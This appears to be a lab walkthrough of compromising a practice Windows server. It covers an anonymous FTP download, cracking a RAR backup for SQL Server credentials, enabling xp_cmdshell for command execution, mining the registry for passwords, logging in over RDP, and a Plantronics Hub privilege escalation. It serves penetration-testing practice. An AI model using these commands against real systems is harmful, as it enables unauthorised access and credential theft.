Nmap Results
# Nmap 7.92 scan initiated Mon Aug 29 23:02:31 2022 as: nmap -T5 -p80,135,139,445,1221,1435,3389,5985 -A -oA scan-all -Pn 192.168.179.70
Nmap scan report for 192.168.179.70
Host is up (0.081s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Plantronics
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1221/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 04-27-20 07:02PM 18866 Elementum Supremum.docx
| 04-27-20 07:02PM 764176 file_example_MP3_700KB.mp3
| 04-27-20 07:02PM 15690 img.jpg
| 04-27-20 07:02PM 302 MSSQL_BAK.rar
| 04-27-20 07:02PM 548 palindromes.txt
|_04-27-20 07:02PM 45369 server.jpg
| ftp-syst:
|_ SYST: Windows_NT
1435/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-08-28T05:05:51
|_Not valid after: 2052-08-28T05:05:51
|_ssl-date: 2022-08-30T03:03:59+00:00; 0s from scanner time.
| ms-sql-ntlm-info:
| Target_Name: MEATHEAD
| NetBIOS_Domain_Name: MEATHEAD
| NetBIOS_Computer_Name: MEATHEAD
| DNS_Domain_Name: Meathead
| DNS_Computer_Name: Meathead
|_ Product_Version: 10.0.17763
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: MEATHEAD
| NetBIOS_Domain_Name: MEATHEAD
| NetBIOS_Computer_Name: MEATHEAD
| DNS_Domain_Name: Meathead
| DNS_Computer_Name: Meathead
| Product_Version: 10.0.17763
|_ System_Time: 2022-08-30T03:03:19+00:00
| ssl-cert: Subject: commonName=Meathead
| Not valid before: 2022-08-27T05:05:45
|_Not valid after: 2023-02-26T05:05:45
|_ssl-date: 2022-08-30T03:03:59+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Timing level 5 (Insane) used
No OS matches for host
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2022-08-30T03:03:23
|_ start_date: N/A
TRACEROUTE (using port 3389/tcp)
HOP RTT ADDRESS
1 80.90 ms 192.168.49.1
2 81.25 ms 192.168.179.70
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Aug 29 23:04:00 2022 -- 1 IP address (1 host up) scanned in 89.54 seconds
Service Enumeration
TCP/139,445
Test for anonymous SMB enumeration.
TCP/1221
Test Anonymous FTP Access
Microsoft ftpd
is running on this port. The nmap
scan results show that anonymous logon is enabled.
Let's make a directory and store the files there.
mkdir ftp-files
ftp> lcd ftp-files
ftp> prompt
ftp> mget *
Analyze the Files
MSSQL_BAK.rar
We can try and crack it with john
by using the rar2john
tool.
rar2john MSSQL_BAK.rar > hash.txt
john --wordlist=rockyou.txt hash.txt
Let's see if we can open the archive now.
Looks like some database admin credentials, possibly. sa:EjectFrailtyThorn425
.
TCP/80
Looking at the icon on this page, I'm not familiar with it. But, the URL for the image is: http://192.168.179.70/images/plt-hub-orange.png
. I search Google for the Plantronics Hub logo and get a match.
I check searchsploit
for anything related to this product.
searchsploit plantronics
Looks like there are some privilege escalation possibilities to keep in our pocket for later.
Plantronics Hub 3.13.2 - Local Privilege Escalation | windows/local/47845.txt
Plantronics Hub 3.13.2 - SpokesUpdateService Privilege Escalation (M | windows/local/47944.rb
Gobuster Enumeration
gobuster dir -u http://192.168.179.70/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -x aspx,asp,html -r -o gobuster80.txt
Nothing interesting with the gobuster
enumeration.
TCP/1435
The nmap
scan identifies this as Microsoft SQL Server 2017 14.00.1000
. Now that we have DB credentials from the backup file, let's use Impacket's mssqlclient.py
to connect to the database and see what we can do.
mssqlclient.py -port 1435 'sa:EjectFrailtyThorn425@192.168.179.70
Once we're connected, we can run enable_xp_cmdshell
to allow command execution (I found it was disabled when I first tested the client connection).
SQL> help
SQL> enable_xp_cmdshell
SQL> RECONFIGURE
SQL> xp_cmdshell whoami
Exploit
Details
The path to code execution on the host went as follows:
- Anonymous login to the FTP server allowed for retrieval of a MSSQL backup
- The backup was compressed in a password-protected
.rar
archive with a crackable password - Given the credentials in the backup file, we can execute arbitrary commands on the host
Gaining a Foothold
Enable XP_CMDSHELL
We can use Impacket's mssqlclient.py
script to connect to the MSSQL server. Then, we'll need to enable xp_cmdshell
to run commands on the host.
mssqlclient.py -port 1435 'sa:EjectFrailtyThorn425@192.168.179.70
SQL> enable_xp_cmdshell
SQL> EXEC xp_cmdshell 'whoami'
SQL> EXEC xp_cmdshell 'ipconfig'
No Reverse Shell
I spent far too long trying a mix of different delivery mechanisms and payload types to get a reverse shell on the target. I tried delivering with:
smbserver.py
- Python web server
And, I verified the payloads made it on the target. Just no matter what I tried – encodings, scripts, binaries, nothing worked, which was frustrating to say the least.
Password Mining
I had look around the file system for configuration files that might have a password, but no luck. So, I turned to the registry. My first registry search returned nothing.
EXEC xp_cmdshell 'reg query HKLM\SYSTEM /f password /t REG_SZ /s'
However, this search produced an interesting find.
EXEC xp_cmdshell 'reg query HKLM\SYSTEM /f pass /t REG_SZ /s'
Now, if we look at the output of the net user
command, we can summarize that this is either Administrator
's or jane
's password. We can test the password with smbclient
.
Jane doesn't have access to either of these privileged shares, but we do know her password and RDP is open on this host.
xfreerdp /v:'192.168.179.70' /u:'jane' /p:'TwilightAirmailMuck234'
Post-Exploit Enumeration
Operating Environment
OS & Kernel
Host Name: MEATHEAD
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00429-70000-00000-AA207
Original Install Date: 4/27/2020, 9:52:21 PM
System Boot Time: 8/28/2022, 5:05:34 AM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~3094 Mhz
BIOS Version: VMware, Inc. VMW71.00V.18227214.B64.2106252220, 6/25/2021
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume2
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC) Coordinated Universal Time
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,053 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 2,765 MB
Virtual Memory: In Use: 2,034 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: \\MEATHEAD
Hotfix(s): 7 Hotfix(s) Installed.
[01]: KB4552924
[02]: KB4462930
[03]: KB4494174
[04]: KB4512577
[05]: KB4537759
[06]: KB4549947
[07]: KB4551853
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 192.168.179.70
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
Current User
USER INFORMATION
----------------
User Name SID
============= =============================================
meathead\jane S-1-5-21-4244463105-466391970-2126029592-1000
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\REMOTE INTERACTIVE LOGON Well-known group S-1-5-14 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Users and Groups
Local Users
User accounts for \\MEATHEAD
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
jane WDAGUtilityAccount
Local Groups
Aliases for \\MEATHEAD
-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Administrators
*Backup Operators
*Certificate Service DCOM Access
*Cryptographic Operators
*Device Owners
*Distributed COM Users
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Power Users
*Print Operators
*RDS Endpoint Servers
*RDS Management Servers
*RDS Remote Access Servers
*Remote Desktop Users
*Remote Management Users
*Replicator
*SQLServer2005SQLBrowserUser$WIN-OHNBE5J07GP
*Storage Replica Administrators
*System Managed Accounts Group
*Users
Network Configurations
Interfaces
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.179.70
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.179.254
Open Ports
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 852
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:1221 0.0.0.0:0 LISTENING 2328
TCP 0.0.0.0:1435 0.0.0.0:0 LISTENING 3424
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 1008
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 484
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 1060
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1348
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 2044
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 2264
TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 604
TCP 0.0.0.0:49670 0.0.0.0:0 LISTENING 616
TCP 127.0.0.1:32017 0.0.0.0:0 LISTENING 6360
TCP 127.0.0.1:32018 0.0.0.0:0 LISTENING 6360
TCP 192.168.179.70:139 0.0.0.0:0 LISTENING 4
TCP [::]:80 [::]:0 LISTENING 4
TCP [::]:135 [::]:0 LISTENING 852
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:1221 [::]:0 LISTENING 2328
TCP [::]:1435 [::]:0 LISTENING 3424
TCP [::]:3389 [::]:0 LISTENING 1008
TCP [::]:5985 [::]:0 LISTENING 4
TCP [::]:47001 [::]:0 LISTENING 4
TCP [::]:49664 [::]:0 LISTENING 484
TCP [::]:49665 [::]:0 LISTENING 1060
TCP [::]:49666 [::]:0 LISTENING 1348
TCP [::]:49667 [::]:0 LISTENING 2044
TCP [::]:49668 [::]:0 LISTENING 2264
TCP [::]:49669 [::]:0 LISTENING 604
TCP [::]:49670 [::]:0 LISTENING 616
Privilege Escalation
Writable Privileged Directory
Using the information found in my earlier service enumeration, we know that the installed version of Plantronics Hub is vulnerable to a local privilege escalation exploit. Copy the exploit to your working directory and have a look over the exploit details.
searchsploit -m 47845
less 47845.txt
You'll note that the exploit tells us to place a MajorUpgrade.config
file in C:\ProgramData\Plantronics\Spokes3G
, with a crafted payload in the configuration file. Let's double check the ACL on the directory.
Indeed, it looks like BUILTIN\Users
– an unprivileged group – has write-access to a directory they shouldn't.
Execute the Exploit
I wrote a PowerShell script to automate the process. When I tried running the commands individually, the file would be deleted too quickly and SYSTEM shell would not spawn. So, I wrote a script that would prop the file open while the payload is written to it and spawn the shell. Usage examples are provided in the repo.
Download the script file to the target and run the script.
Flags
C:\users\jane\Desktop\local.txt
32d5ddc986de6979a730ef057c17df82
C:\users\Administrator\Desktop\local.txt
7ab84514f5dff5f19ec54f23b6b4bfc7